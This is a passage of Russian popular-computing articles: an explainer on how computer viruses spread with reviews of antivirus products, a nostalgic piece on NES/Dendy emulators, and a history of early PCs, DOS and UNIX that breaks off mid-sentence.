т.п.; они заражают только программы. Кроме того, вирусы Macintosh не заражают компьютерные программы для DOS и наоборот. Например, знаменитый вирус Michelangelo не заражает приложения для Macintosh. Опять же, исключение из этого
правила составляют макровирусы Word и Excel, которые поражают электронные таблицы, документы и шаблоны, которые могут открывать компьютеры Windows или Macintosh. Наконец, вирусы не обязательно как-то проявляют себя – даже после того как что-то испортилось.
Как распространяются вирусы:
Вирусы распространяются при запуске зараженного приложения или загрузке компьютера с диска, системные файлы которого заражены. Например, если программа текстового процессора заражена вирусом, он активизируется при работе этой программы.
Когда вирус находится в памяти, он обычно заражает любую программу, с которой Вы работаете, включая сетевые приложения (если у Вас есть право записи на сетевые диски или в папки). Вирусы ведут себя по-разному. Некоторые остаются активными в памяти до выключения компьютера. Другие — только до тех пор, пока работает зараженная программа. Выключение компьютера или выход из приложения удаляет вирус из памяти, но не из зараженного файла или с диска. Если вирус находится в системном файле, он активизируется при следующей загрузке системы с зараженного диска. Если вирус
находится в приложении, он снова активизируется при следующем запуске этого приложения.
Доктора вызывали?
Заканчивая тему нельзя не коснуться самого главного, а именно защиты от напасти под названием компьютерный вирус. Для этого существуют антивирусные пакеты. К сожалению, многие из них платные, а другие нет. В любом случае я приведу обзор этих программ, а Вам уже решать, что использовать у себя дома, а что в офисе с разветвлённой локальной сетью.
Платные антивирусы:
AVP www.avp.ru

«Лаборатория Касперского» предлагает широкий спектр антивирусного программного обеспечения, как для индивидуальных пользователей, так и для корпоративных сетей под
названием AntiViral Toolkit Pro.
«…Мы предлагаем все типы антивирусной защиты: антивирусные сканеры, мониторы и ревизоры контроля несанкционированного изменения на диске…». АВП поддерживает все наиболее популярные операционные системы, почтовые системы, межсетевые экраны (firewall). А так же обеспечивает полный контроль, за всеми возможными каналами проникновения компьютерных вирусов. Мощные локальные и сетевые средства автоматизации и централизованного контроля над антивирусной защитой «Лаборатории Касперского» обеспечивают пользователям максимальное удобство и скорость при построении собственной системы защиты против компьютерных вирусов.
Антивирусные продукты «Лаборатории Касперского» имеют сертификаты российских и международных государственных организаций и независимых тестовых лабораторий.
Продукты Symantec Corpotation:

http://www.symantec.com Symantec AntiVirus™ – полнофункциональное антивирусное решение, обеспечивающее многоуровневую защиту корпоративного класса для шлюзов Интернета и почтовых шлюзов, серверов и рабочих станций. Благодаря сочетанию получившей признание пользователей антивирусной технологии и глобальной инфраструктуры поддержки корпорации Symantec эти программы обеспечивают надежную защиту. Использованные в этих пакетах эффективные технологии и поддержка защиты сети на всех уровнях устраняют необходимость в создании системы обеспечения безопасности из разрозненных продуктов, выпущенных различными поставщиками.
Центральная консоль управления Symantec System Center™ позволяет системным администраторам развертывать антивирусные решения, а затем создавать, принудительно проводить и обновлять политики, обеспечивающие правильную постоянную настройку серверов и рабочих станций, в масштабе всего предприятия и на различных платформах.
Продукты пакета, предназначенные для работы в шлюзах, обеспечивают быстродействующую масштабируемую защиту, предотвращающую проникновение вирусов в защищаемую сеть. Развитые средства автоматизации уменьшают объем администрирования, обеспечивают организациям улучшенную защиту и сокращают время
отклика. Технология Digital Immune System™, примененная в пакетах Symantec AntiVirus,
позволяет автоматически выполнять поиск, обнаружение и изоляцию новых вирусов, обеспечивая быстродействующую, надежную и не требующую вмешательства оператора защиту. Кроме того, уникальная многоуровневая технология NAVEX™, разработанная корпорацией Symantec, обеспечивает обновление описаний вирусов и модулей расширения без повторного развертывания программ и перезагрузки системы, благодаря чему увеличивается время бесперебойной работы системы и сокращается совокупная стоимость владения. Для повышения быстродействия и улучшения безопасности в новой
версии уменьшен объем файлов описаний вирусов, а также включена возможность многопоточного серверного развертывания. Пакеты Symantec AntiVirus™, как и
другие продукты корпорации Symantec, предназначенные для обеспечения безопасности,
поддерживается службой Symantec™ Security Response, ведущей организацией, занимающейся исследованиями и предоставлением технической помощи в области обеспечения безопасности при работе с Интернетом.
Семейство McAfee Security:

http://www.mccafee.com Семейство McAfee Security — предназначено для комплексной антивирусной защиты любого уровня: от карманного и персонального компьютера до распределенной корпоративной сети. Пользователи антивирусных продуктов McAfee – более 70 миллионов человек по всему миру. Кроме того, антивирусная защита McAfee является корпоративным стандартом для 80% компаний, входящих в «Fortune 100» (100 ведущих мировых компаний). Продукты McAfee Security обеспечивают полную защиту для всех распространенных операционных систем и приложений, обнаруживая и корректно удаляя более 60 тысяч вирусов и враждебных программ. Помимо традиционной антивирусной защиты McAfee Security предлагает первое на рынке средство превентивной
защиты от вирусов — ThreatScan, а также брандмауэр и систему обнаружения вторжений
на уровне рабочих станций – McAfee Desktop Firewall. Полная защита от вирусов
Антивирусы McAfee обеспечивают высочайший уровень защиты, неоднократно подтвержденный сертификатами ICSA, Checkmark Level 2, VirusBulletin 100%
Detection и многочисленными независимыми тестами. Обнаруживаются и удаляются все типы вирусов и троянских программ, враждебные объекты Java/ActiveX, блокируется доступ к опасным WEB-ресурсам. Обнаружение более 60000 вирусов Антивирусный механизм Olympus, разработанный на базе передовых технологий McAfee и Dr. Solomon обнаруживает более 60 000 вирусов и враждебных программ, обеспечивая самый высокий на рынке показатель восстановления поврежденных файлов. Полномасштабная защита всех ОС McAfee Security охватывает все операционные системы и групповые приложения, используемые в современных корпоративных сетях: клиентские ОС Windows 95 / 98 / ME / NT Workstation / 2000 Professional / XP Home & Professional, DOS, Macintosh.
Cерверные ОС Windows NT Server, Windows 2000 Server / Advanced Server / Datacenter, Novell Netware 4.11 / 4.2 / 5.0 / 5.1 / 6.0, FreeBSD, Linux, HP-UX, AIX, SCO, Solaris. Групповые приложения MS Exchange 5.5/2000 и Lotus Notes/Domino. Интернет — шлюзы Windows NT/2000 и Sun Solaris; сетевые устройства хранения данных NetApp; ОС микрокомпьютеров (PDA) Palm OS, Windows CE / Pocket PC, EPOC (Psion). Превентивная защита сети от вирусов. Не имеющий аналогов на рынке продукт ThreatScan позволяет применять профилактические меры для защиты сети от потерь, связанных с вирусными эпидемиями, посредством регулярных проверок сети на предмет уязвимостей без необходимости привлечения экспертов по безопасности. ThreatScan обнаруживает незащищенные, неуправляемые, зараженные или уязвимые машины сети. Использование ThreatScan позволяет перейти от схемы реагирования на возникшие вирусные эпидемии к схеме предотвращения эпидемий, что избавляет от соответствующих затрат на устранение последствий деятельности вирусов.
Бесплатные антивирусы:
AVTrojan и Anti-VBS http://www.trojan.ru
Эти две простые программы написаны Игорем Суменковым. AVTrojan представляет собой программу, призванную бороться с таким подвидом вредоносных программ, как «троянские кони». Для тех, кто не знает, могу сообщить: это программы, которые рекламируется как нечто полезное, но на самом деле не выполняют такого предназначения или, помимо полезных действий, совершают противозаконные действия в руках злоумышленников. Окно, появляющееся при запуске Anti-VBS, сразу раскрывает все возможности программы. Программа AVTrojan весьма проста, но эффективна. Она позволяет проверить: память, реестр, папки или отдельные файлы как вместе, так и по отдельности. Все функции доступны из панели инструментов продукта или, как обычно, через меню. Настройки программы минимальны, и самыми полезными из них, на мой взгляд, являются запуск одновременно с Windows и непонятно как попавшее сюда охлаждение процессора. Стоит отметить, что в отличие от обычных антивирусов AVTrojan является специализированным средством, созданным только для уничтожения «троянских» программ, поэтому и методы немного отличаются от обычных. Если пользователь запросил удаление «троянской» программы, обычный антивирус пытается удалить соответствующий ей файл на диске. Однако если данная «троянская» программа уже запущена, то ликвидировать такой файл нельзя, потому что он занят Windows. Результат — сообщение «Невозможно удалить вирус», и начинающий пользователь ничего не сможет сделать. AVTrojan же удаляет любую обнаруженную «троянскую» программу в любом состоянии. Если она уже запущена, то принудительно закрываются все процессы в памяти, соответствующие данной программе, и после этого файл корректно удаляется.
Вторая программа, Anti-VBS, имеет весьма узкую специализацию и предназначена для поиска и уничтожения вируса I love you, а также всех его модификаций. В принципе возможно обнаружение и других VBS (Visual Basic Script) вирусов. Никаких настроек и премудростей у программы нет. Галочка «Лечить зараженные файлы» и кнопки «Старт» и «Выход».
InoculateIT Personal Edition http://antivirus.cai.com
Эта программа компании Computer Associates International представляет собой мощный антивирусный комплекс, способный защитить компьютер от любых типов вирусов. Для получения программы надо зарегистрироваться на сайте разработчика. Данный антивирус работает под управлением Windows. Защита осуществляется в реальном времени, необходимый программный модуль загружается одновременно с Windows. Кроме того, вы всегда можете проверить жесткие и гибкие диски на предмет вирусов и других вредоносных программ. Антивирус построен наподобие Проводника, так что вы без проблем можете проверить как отдельные файлы, так и вызывающие у вас подозрения папки. Программа ведет подробную статистику, которая записывается в файл прямо с самого начала работы, отображая все данные в нижнем окне. Кроме того, InoculateIT способен проверять содержимое основных типов архивных файлов, что ставит его в один
ряд с самими современными антивирусами. Программа предусматривает создание шаблонов для проверки по всем дискам, возможность их сохранения и даже создания специальной дискеты для этого. Также данный антивирус защищается паролем, что будет полезно системным администраторам. Опции InoculateIT, касающиеся операций с макровирусами. InoculateIT поддерживает автоматическое обновление баз по вирусам и
поставляется вместе с энциклопедией этих вредных программ, где довольно подробно описаны их основные виды и особенности. Также неплохой Help. Содержит словарь основных терминов, но, как я уже говорил, все на английском языке, так что пользователям, плохо его знающим, от наличия этого словаря легче не станет. Работает программа весьма шустро и в целом оставляет после себя хорошее впечатление.
The Nicks Ghost Buster http://members.tripod.com/~NGBuster
Данная программа российского производства является ревизором диска, работающим в среде Windows 9х и NT. По функциональным возможностям Ghost Buster является конкурентом популярной программы ADinf. Но отличается от последней тем, что работает под управлением Windows. Со всеми вытекающими отсюда последствиями. Такими, как: графический интерфейс (GUI), многозадачная работа, многопоточность, истинная 32-разрядность. Самый главный плюс, по словам автора, в том что, можно обращаться напрямую к дискам (практически любым, не только физическим) через драйвер IOS (Супервизор ввода-вывода или драйвер 32-бит доступа к диску) в обход DOS-резидентов (в частности, Boot-вирусов, перехвативших 13h прерывание при загрузке компьютера), что не под силу DOS-программам. Понятно, что справедливо это только при работе в Windows9x. Основное окно программы The Nicks Ghost Buster заставляет вас вспомнить всем знакомый сериал о четверке охотников за привидениями. The Nicks Ghost Buster запоминает и при каждом запуске проверяет информацию об операционной системе и установленном аппаратном обеспечении — объем оперативной памяти DOS (изменения которой бывают при заражении большинством загрузочных вирусов), количество установленных винчестеров, таблицы параметров винчестера (Hard Disk Parameter Table). При всех этих проверках программа просматривает диск по секторам, обращаясь непосредственно в IOS, и не использует прерывания Int 21h и Int 13h, что
позволяет успешно обнаруживать активные маскирующиеся вирусы (Stealth-вирусы).
Действует программа следующим образом: при первом запуске она запоминает объем оперативной памяти DOS, адрес обработчика INT 13h, таблицы параметров диска и создает таблицы для проверяемых дисков. Потом антивирус проверяет диски в следующей последовательности: Проверяется объем оперативной памяти, доступной DOS, и таблица параметров жесткого диска (HDPT). Проверяются Master-Boot и Boot-секторы. Если найдены их изменения, то сравниваются текущие системные таблицы с теми, которые были ранее, и по желанию можно восстановить прежний сектор. Сектор
Master-Boot анализируется при проверке всех логических дисков. Проверяется список номеров сбойных кластеров, так как некоторые вирусы помечают хороший кластер как сбойный и используют этот кластер для размещения в нем своего кода и данных.
Проверяется дерево каталогов диска. Ищутся новые и удаленные каталоги. Проверяются файлы. Ищутся новые, удаленные, переименованные, перемещенные из одного каталога в другой и измененные файлы. Проверяется изменение длины даты и времени создания
файла и контрольной суммы файла. В завершение изменения анализируются, и если они, по мнению антивируса, «безобидны», т. е. не похожи на проявления вируса, то программа просто представит вам всю информацию об изменениях. Если же происходят «подозрительные» изменения (похожие на проявления вируса), то NGB предупредит вас о возможности заражения. Интерфейс программы весьма прост и нагляден. Есть у The Nicks Ghost Buster одно неудобство — нельзя проверить определенный каталог на диске. Диск всегда проверяется только целиком, по разделам. Вообще же продукт производит приятное впечатление, и его можно смело рекомендовать если не к ежедневному применению, то по крайней мере к знакомству.
В завершении хочу сказать лишь одно, самый сильный антивирус это ваше благоразумие!!!

При создании статьи была использована информация с сайтов: http://www.submarine.ru http://www.avp.ru http://www.symantec.com , а так же других разработчиков программ представленных выше. В публикации был использован фрагмент книги Юлия Кима “Всё о вирусах”.

Роман Карпач

Восьмибитное чудо.

Было время, когда все компьютерные игры были добрыми и весёлыми. В них не было того насилия, которое присуще их современным братьям. Но это не мешало нам засиживаться перед телевизором с любимой приставкой допоздна, проходя бесконечные лабиринты Принца Персии, спасая мир от злобных мутантов в Контре да и просто весело проводить свой досуг. Теперь никто из нас будет покупать приставку, чтобы поиграть в Марио. Да и зачем? Оказывается, что любимые приставочные игры можно запускать и на вашем PC! В этом нам как всегда поможет Интернет.
1.История Nintendo
Nindendo, Lifa, Dendy, Ufa, Сюбор – у неё было множество названий. Приставки, которая покорила весь мир. Игровой платформы ставшей самой популярной за всю историю развития развлекательной компьютерной индустрии. В разных странах ей давали разные имена. Nintendo (так ее звали в штатах), Famicom (это имя ей присвоили японцы), Dendy (слоненок, название и фирменный логотип придумала фирма, распространявшая приставку на территории СНГ), в конце концов, просто NES. Восьмибитка, как ласково в народе называли приставку, являлась самой популярной консолью. Хотя на рынке уже в начале 90-х появились шестнадцатибитные Sega. Ведь, по большому счету, именно с этой платформы началась история видеоигр. Приставка появилась в Японии в 1982 году, после чего была представлена всему миру в 1984 году. Но для начала следует обрисовать картину рынка видеоигр тех времен. С момента появления первого аркадного автомата прошло уже практически пять лет. К тому времени игровые залы стали обыденностью, а автоматы с играми Defender и Galaxian, Guruin и Bubble можно было найти в любой забегаловке, в любом кинотеатре.


buble2

Такого понятия, как игровая приставка, тогда еще не существовало. И никто даже представить себе не мог, что когда-то появятся домашние игровые машины. Фирма Nintendo of Japan к тому времени уже имела некоторый опыт производства видеоигр. На разработку приставки ушло около года. И вот Pasofami (японское название NES) явилась на суд игровой общественности. Покупатели, мягко говоря, несколько опешили. А потом начался настоящий бум на продукцию Nintendo. Приставки расходились по всему миру гигантскими партиями. Разработчики со всего света подписывали контракты на производство игр под их приставку. А пользователи были на седьмом небе от счастья, сидели у телевизоров как приклеенные, играя во все подряд, боготворя героя Марио и ведя бои с ордами вражеских танков в Battle City.

bc

И ведь было за что хвалить — такого успеха на видеорынке еще никто не добивался. Грамотная рекламная политика, забота о пользователе и большой объем выпущенных игр сделали свое дело — NES побила все рекорды по продажам и на данный момент, даже на фоне новых 64-битных платформ, все еще является рекордсменом по количеству проданных экземпляров. А ведь вы, наверное, и не знаете, что Nintendo представляет собой внутри? Приставка снабжена процессором с тактовой частотой около 1.8MHz. Ее выход пришелся на время резкого скачка популярности персональных компьютеров, поэтому приставки переживали серьезный кризис. Тем не менее, простота в обращении и новый дизайн сделали свое дело, и эта платформа буквально в течение года стала самой популярной в мире. Этому, в частности, способствовала игровая поддержка, большой ассортимент игр и регулярно выходящие новинки. Приставка поддерживала разрешение 256 х 224, что было эталоном для 8-битных приставок, и палитру из 52 цветов, из которых 26 одновременно выводились на экран, все это поддерживалось 5-канальным звуком. Официально для платформы вышло более 3000 игр. Хотя на Западе приставка уже не продаётся с начала 90-х. Наши братья из дружественного Китая продолжают их продавать у нас в стране.
2. Компьютер и Nintendo
Время пролетело незаметно. И в один прекрасный день, увидев свою любимую приставку на рынке. Я подумал. Ведь есть же эмуляторы старых компьютеров таких как: Спектрум, Атари, Корвет?! Почему же не может быть их и для нашей любимой приставки? Придя, домой гложимый воспоминаниями я зашёл в Интернет. После продолжительных поисков мне открылись несколько сайтов на которых находились огромные коллекции некогда всеми любимых игр. По адресу http://emulators.wallst.ru/nintendomul.htm имеется внушительная коллекция эмуляторов DENDY. Программы сами по себе небольшие. Для вас я бы порекомендовал эмулятор под названием NESTICLE. Хотя он и работает в среде DOS, но его функциональность и возможности могут только радовать. С помощью этой программы мы можем записывать музыку с любимых игр, менять разрешения экрана, делать скриншоты высокого качества. Самым же главным достоинством NESTICLE является то, что он не искажает звук. Ну, ведь эмулятор это только пол дела. Следует так же скачать восьмибитные игры. Все они хранятся в файлах с расширением *.NES. На сайте www.apm.boom.ru вы найдёте всё, во что вы когда-то играли. Например, любимого МАРИО.

2mario

Единственное что может вызвать головную боль, так это не желание запускаться некоторых игр. Поэтому скачайте несколько разных эмуляторов. Ведь бывает так, что игра не работает с NESTICLE, но работает с JNES. ftp.cs.albany.edu/pub/kesecki/nestcle — этот ftp архив тоже должен порадовать вас своей большой коллекцией. В общей сложности мне удалось найти 94 игры. И теперь с чувством глубокого душевного удовлетворения я могу сказать, что любимая восьмибитка живёт не только в наших сердцах, но и на жёстких дисках наших компьютеров!

Роман Карпач

Все они с одной планеты

При создании статьи использованы материалы сайтов: http://www.edu.yar.ru, http://ol.holm.ru, http://www.astu.astranet.ru и так же публикации зарубежной прессы.
Этот материал я хочу посвятить всем тем специалистам, которые на протяжении долгих лет создавали и совершенствовали персональные компьютеры, писали для них новые операционные системы, улучшали пользовательский интерфейс программ. В этой публикации будет рассказано про тот период, когда зародились все основные операционные системы для PC. Про тех людей, которым мы обязаны появлением DOS и UNIX. К этой статье я подошёл со всей ответственностью, но всё равно в ней возможны некоторые неточности и недочёты. Из-за того, что одна информация противоречит такой же с других мест. Вероятно, это вызвано тем, что события по компьютерным меркам произошли очень давно. А память человека не долговечна. И начнём, пожалуй, с хронологии развития вычислительной техники. Ведь развитие программного рынка напрямую было связано с развитием аппаратных средств.
Часть-1. Родители персонального компьютера.
1971 — первый коммерчески доступный микропроцессор.
Название: Intel 4004. Разработчик: корпорация Intel, разработка для компании Busicom.
1971 — первое регулярное использование 8-дюймовой гибкой дискеты. Разработчик: Алан Шугарт (Alan Shugart) в IВМ.

1972 — первое клонирование компьютеров фирмы IBM. Название: ЕС ЭВМ. Разработчики страны-участницы СЭВ (Совета экономической взаимопомощи) — Болгария, Венгрия, ГДР, Польша, СССР и Чехословакия. Приблизительный период разаботки:1970 — 1987. Единая с американцами система электронных вычислительных машин (ЕС ЭВМ) базировалась на архитектуре IBM 360/370. Значительно позже в 80-х годах подобные копии с IВМ РС/ХТ стали называться клонами или «аналогами», и потеснили «Голубого гиганта» на вторые роли. Возникло даже движение — «клономания», продолжающееся и по сей день.
1972 — первый цифровой микрокомпьютер, доступный для персонального использования.
Название: MITS 816. Разработчик: МIТS (Micro Instrumentation and Telemetry System «микро аппаратура и телеметрические системы»).
1973 — первый полнофункциональный персональный компьютер, укомплектованный монитором. Название: Alto. Разработчик: фирма Хегох, лаборатория в Пало-Альто (Хегох PARK). Приблизительный период разработки: 1970 — 1973.
1974 — первый выставленный на продажу комплект для сборки персонального компьютера. Название: Mark-8. Разработчик: Джонатан Титус (Jonatan Titus).
Приблизительный период разработки: 1973 — 1974.
1975 — первый серийно произведенный и выставленный на продажу персональный компьютер в комплекте для сборки и собранный. Название: Altair 8800. Разработчики: Эдвард Робертс (Edvard Roberts), Вильям Ятес (Wiliam Yates) и Джим Байби (Jim Bybee).Приблизительный период разработки: 1973 — 1974. Первый Altair использовал процессор Intel 8080 и 4 Кбайт памяти. По заказу Эдварда Робертса из компании MITS, распространяющей компьютер, Бил Гейтс и Поль Ален написали интерпретатор языка Бейсик, втиснув его в имеющиеся 4 Кбайт (этим до сих пор гордится Б. Гейтс). Так начиналась софтверная компания Microsoft.

ALTAIR
1975 — первый персональный компьютер IBM Portable Computer. Название: IВМ 5100. Разработчик: IBM. Приблизительный период разработки: 1973 — 1975 продажа и маркетинг этого устройства были неудачны. Портативный компьютер с ленточным устройством ввода/вывода и крошечным дисплеем. Это IBM 5100 — один из самих первых персональных компьютеров. IBM 5100 Portable Computer был первой (и неудачной) попыткой IBM сформировать персональный компьютер в конце 1974 года. Он весил около 23 кг и стоил около 10000 долларов.

IBM 500
У компьютера были встроенный ленточный накопитель, маленький экран и возможность управления программами на Бейсике или APL (языке программирования, созданном IBM). IBM не полагалась на микропроцессор Intel, в отличие от следующих, более успешных моделей. Монитор отображал 16 строк по 64 символа в каждой, память расширялась до 64 Кбайт, и ленточное устройство использовало стандартную музыкальную кассету, которая сохраняла приблизительно 200 Кбайт данных. Компьютер разрабатывался для использования в малом бизнесе, но высокая стоимость, недостатки интерфейса и невозможность обмена данными с другими компьютерами ограничили его применение и не позволили стать широко используемым персональным компьютером.
1976 -первый чрезвычайно успешно продаваемый персональный компьютер. Название: Apple II Разработчики: Стив Джобс (Steve Jobs) и Стив Возняк (Steve Wozniak). Приблизительный период разработки: 1974 — 1976. Первый компьютер Apple II , собранный буквально на коленках, не слишком отличался от своих собратьев (Altair и другие). И только линия Apple II, выполненная на коммерческой основе, стала чрезвычайно популярна. Немного позже появились Applle III и Lisa, a только затем — Macintosh, вышедший как Мас 128К (со всеми новинками, приписываемыми фирме Аррlе как первооткрывателю). Аррlе II имел 48 Кбайт памяти и S.O.S. (Sophisticated Operating System — «замысловатая операционная система»); он создал тенденцию всеобщей компьютеризации и породил фанатизм, который мешает адекватному восприятию компьютеров этой компании.

APPLE 2
1981 — первый успешно продаваемый персональный компьютер IВМ. Название: IВМ РС. Разработчик: IBM. Приблизительный период разработки: 1978 — 1981. Оригинальный РС — это модель 1983 года с 640 Кбайт оперативной памяти, но самые ранние модели могли иметь только 64 Кбайт на материнской плате. Этот специфический РС имеет два пятидюймовых дисковода для гибких дискет на 360 Кбайт, один из них фирмы IBM, а другой — от некой третьей фирмы. Потребляет всего 63,5 Вт. Зеленый экран монитора (нет переключателя «вкл/выкл. «) и «кликающая» клавиатура с небольшими клавишами Shift и Return. IВМ представила Personal Computer, или персональный компьютер ПК, 12 августа 1981 года. В то время большинство компьютеров все еще были 8- разрядными и могли обрабатывать 8 бит информации за такт. IBM революционизировала компьютерную индустрию. Выйдя на рынок с персональным компьютером базирующемся на процессоре Intel 8088 и совместимом с компьютерами на 8-разрядных процессорах, но обрабатывающем до 16 бит информации за такт. РС показал пример расширяемой архитектуры, известной как «открытая архитектура», которая дала возможность пользователям добавлять новые компоненты к их компьютерам без замены целого устройства. Первоначально IBM РС (модель 5150) приходил с 16 Кбайт стандартной оперативной памяти (микросхемы 9х16 Кбит), расширяемой до 64 Кбайт, на материнской плате и до 540 Кбайт возможного общего количества памяти (не 640 Кбайт из-за аппаратной ошибки); имел одноцветный ТТL-монитор (модель 5151). Там зеленым по черному отображалось 25 строк по 80 символов. Он подключался в АС слот на блоке питания компьютера (63,5 Вт), так что не нуждался в собственном выключателе. Монохромный графический адаптер с параллельным портом для принтера, последовательный порт, два места полной высоты для внешних устройств, гибкий дисковод, способный использовать односторонние и двухсторонние дискеты, с одинарной и удвоенной плотностью записи (емкостью 80 — 360 Кбайт). С ХТ начался взрыв в индустрии персональных компьютеров. Он стал возможен в значительной степени благодаря открытой архитектуре IВМ РС и ХТ, ставшей промышленным стандартом.
1981 — первый успешно продаваемый переносной микрокомпьютер с экраном, дисководами и сумкой для переноса. Название: Osborne 1. Разработчик: Osborne Computer Corp. Приблизительный период разработки: 1980 — 1981. Краткое описание: Дисковод для пятидюймовых дискет, крошечный экран (3,55 дюйма по горизонтали и 2,63 по вертикали), шаблон текстового процессора Wordstar на клавиатуре, аккумуляторные батареи и сумка для переноски.
Часть-2 DOS и родственники.
Наверное, стоило бы начать рассказ с чего-то другого. Однако, в силу своей знаменитости в бывшем Советском Союзе операционной системы DOS повествование начнётся с неё. Отсчет DOS-истории начнем с 1973 года — именно в столь теперь далеком от нас году Gary Kildall написал простую операционную систему на созданном им же PL/M языке (Programming Language/Microprocessor). Он называл ее: CP/M — Control Program/Monitor, или Control Program for Microcomputer. К середине 70-х годов СР/М-80, права на которую принадлежали фирме Digital Research, стала наиболее популярной системой для компьютеров на базе Intel 8080 и Zilog Z-80. Эта система обеспечивала доступ к разнообразным средствам прикладного программного обеспечения (текстовые процессоры, администраторы баз данных и так далее). Нормальные же версии, дошедшие и до наших времен, и пользовавшиеся относительной известностью, ведут свой счет с QDOS. Эта менее длинная история, нежели развитие UNIX, началась в 1980 году в фирме Seattle Computer Products. Первоначально названная QDOS, операционная система была модифицирована и, переименовавшись к концу года в 86-DOS, была продана Microsoft. В конце 1981 года, когда новый компьютер IBM PC приобрел широкую популярность (IBM 5150 PC: 4.77-MHz Intel 8088 CPU, 64KB RAM, 40KB ROM, 5.25-дймовый флоппи-дисковод — «всего» $3000), его операционная система представляла собой модифицированную версию системы 86-DOS, названную PC-DOS 1.0.

IBM PC
Её проблема была лишь в том, что под каждую конкретную машину ее приходилось настраивать заново. РС-DOS занялась сама IВМ, а MS досталась ее собственная модификация, именуемая MS-DOS. Вскоре после выпуска IBM PC на рынке стали появляться персональные компьютеры, «схожие с РС» (PC-совместимые). Операционная система этих компьютеров называлась MS-DOS 1.0 — корпорация Microsoft предоставила в распоряжение фирм, производящих эти машины, точную копию операционной системы PC-DOS широко теперь известную MS-DOS. В 1982-м появилась версия МS-DOS 1.1 с некоторыми добавленными и расширенными возможностями. К 1983-му году были разработаны версии 2.0. По сравнению с предыдущими они давали возможность использовать жесткий диск и обеспечивали усложненный иерархический каталог диска, включали встроенные устройства для дискет и систему управления файлами. Третья версия MS-DOS, выпущенная в 1984-м году, дала лишь некоторые улучшения. MS-DOS версии 5.0 (1991 год) предоставила возможность использования памяти, расположенной выше 1M, была добавлена поддержка новых 2.88 MB дискет, а также несколько утилит, в том числе UNDELETE — для восстановления удаленных по ошибке данных. В 1992 году появляется версия 5.a — в ней устранены грубые ошибки работы утилит UNDELETE и CHKDSK. В MS-DOS 6.0, вышедшей в 1993 году, расширились возможности использования памяти, расположенной выше 1M, добавлены утилита оптимизации использования памяти Mem maker. А так же средство увеличения эффективного дискового пространства DoubleSpace, утилиты проверки и оптимизации жесткого диска Scan Disk и Defrag. Для защиты была установлена антивирусная программа (следует отметить, что после судебных разбирательств с компанией Stack по поводу авторского права на Double Space, последний в версии MS DOS 6.22 был заменён утилитой Drive Space). После версии 6.22 появилась сильно урезанная 7.0, входящая в состав Windows 95 service relies. Больше Microsoft DOS не занималась. А тем временем, РС DOS не умирала. Последняя версия включала в себя практически все, что могла МS. Плюс такие функции, как средства резервного копирования и восстановления поврежденных данных, встроенные в систему средства антивирусного контроля, обеспечение синхронизации файлов на двух компьютерах и т. д. Еще одним ярким представителем данного класса была операционная система PTS DOS производства одной из российских физических лабораторий. В ней имеется свой встроенный драйвер кириллицы. Последняя ее версия была обозначена как 6.65. Но самой необычной и малоизвестной является DR-Ореn Dos 7.02. Изначально эту OC разрабатывала Digital Research, но потом по каким-то причинам от нее отказалась и продала ее компании Novell. Она встроила в нее свои сетевые утилиты, продав дальше — фирме CALDERA, которая дополнила DR-DOS средствами доступа в internet и сейчас распространяет ее бесплатно. Серьезным единственным различием всех вышеупомянутых систем с MS DOS было то, что называется «уровнем системы», то есть для каждой машины необходимо было покупать свою операционную систему. Отличительные особенности каждой мог выявить только системный программист, в чьи обязанности входила работа по «подгонке» операционной системы к конкретной машине, при этом пользователь, работающий на разных машинах, не ощущал никакой разницы между ними.
Часть-3 UNIX и семейство.
Считается, что в появлении UNIX виновата компьютерная игра. Дело в том, что Кен Томпсон непонятно чего ради создал игрушку «Space Travel». Он написал ее в 1969 году на компьютере Honeywell 635, который использовался для разработки Multics. Но фишка в том, что ни вышеупомянутый Honeywell, ни имевшийся в лаборатории General Electric 645 не подходили для игрушки. И Кену пришлось найти другую ЭВМ – 18 разрядный компьютер РDР-7. Кен с ребятами разрабатывал новую файловую систему, дабы облегчить себе жизнь и работу решил опробовать свое изобретение на новенькой машине. Опробовал. Весь отдел патентов Bell Labs дружно радовался. Томпсону этого показалось мало и он начал ее усовершенствовать, включив такие функции как inodes, подсистему управления процессами и памятью, обеспечивающую использование системы двумя пользователями в режиме Time Sharing (разделения времени) и простой командный интерпретатор. Кен даже разработал несколько утилит под систему. Собственно, сотрудники еще помнили, как они мучались с OS Multics, поэтому в честь старых заслуг один из них по имени Брайан Керниган решил назвать ее похожим именем UNICS. Через некоторое время название сократили до UNIX (читается так же, просто писать лишнюю букву настоящим программистам во все времена было лень). ОС была написана на ассемблере. Вот мы и подбираемся к тому, что известно в мире как «Первая редакция UNIX». В ноябре 1971 года был опубликован первый выпуск полноценной документации по этой системе. В соответствии с этим и ОС была названа «Первой редакцией UNIX». Вторая редакция вышла довольно быстро. Ну а третья ничем особенным не отличалась. Разве что заставила Дениса Ритчи «засесть за словари «, вследствие чего тот написал собственный язык, известный сейчас как С. И именно на нём была написана 4-я редакция UNIX в 1973 году. В июле 1974 года вышла 5-я версия UNIX. Шестая редакция V6, выпущенная в 1975 году, стала первым коммерчески распространяемым Юниксом. Большая ее часть была написана на C. Позже была полностью переписана подсистема управления оперативной и виртуальной памятью, заодно изменили интерфейс драйверов внешних устройств. Все это, позволило сделать систему легко переносимой на другие архитектуры. И вот поэтому это было названо «Седьмая редакция» (UNIX V7). Параллельно с улучшением Юникса шла разработка системы, известной нам как Fгее BSD. Когда в 1976 году в Университете Берклиопала возникли местные юникс-гуру. Одним из них был Билл Джой. Собрав своих друзей-программистов, Билли начал разработку собственной системы на ядре UNIX .Запихнув помимо основных функций кучу своих (включая компилятор Паскаля), он назвал всю эту сборную солянку Distribution (BSD 1.0). Вторая версия почти ни чем не отличалась от первой. Третья редакция BSD основывалась на переносе UNIX V7 на компьютеры семейства VAX, что дало систему 32/V, лёгшую в основу BSD 3.x. Ну, и самое главное — при этом был разработан стек протоколов ТСР/IР. Разработка финансировалась Минестерством Безопасности США. Первая коммерческая система называлась UNIX SYSTEM III и вышла она в 1982 году. В этой OS сочетались лучшие качества UNIX Version 7. Далее всё развивались примерно так: Во-первых, появились компании, занимавшиеся коммерческим переносом UNIX на другие платформы. К этому приложила руку и компания Microsoft. Вместе с Santa Cruz Operation создавшей UNIX-вариацию под названием XENIX. Во-вторых, Bell Labs создала группу по развитию Юникса и объявила о том, что все последующие коммерческие версии (начиная с System 5) будут совместимы с предыдущими. К 1984-му году был выпущен второй вариант, в котором появились: возможности блокировок файлов и записей, копирования совместно используемых страниц оперативной памяти при попытке записи (сору-on-write), страничного замещения оперативной памяти и т. д. К этому времени ОС UNIX была установлена на более чем 100 тыс. компьютеров. В 1987-м году выпущен третий релиз 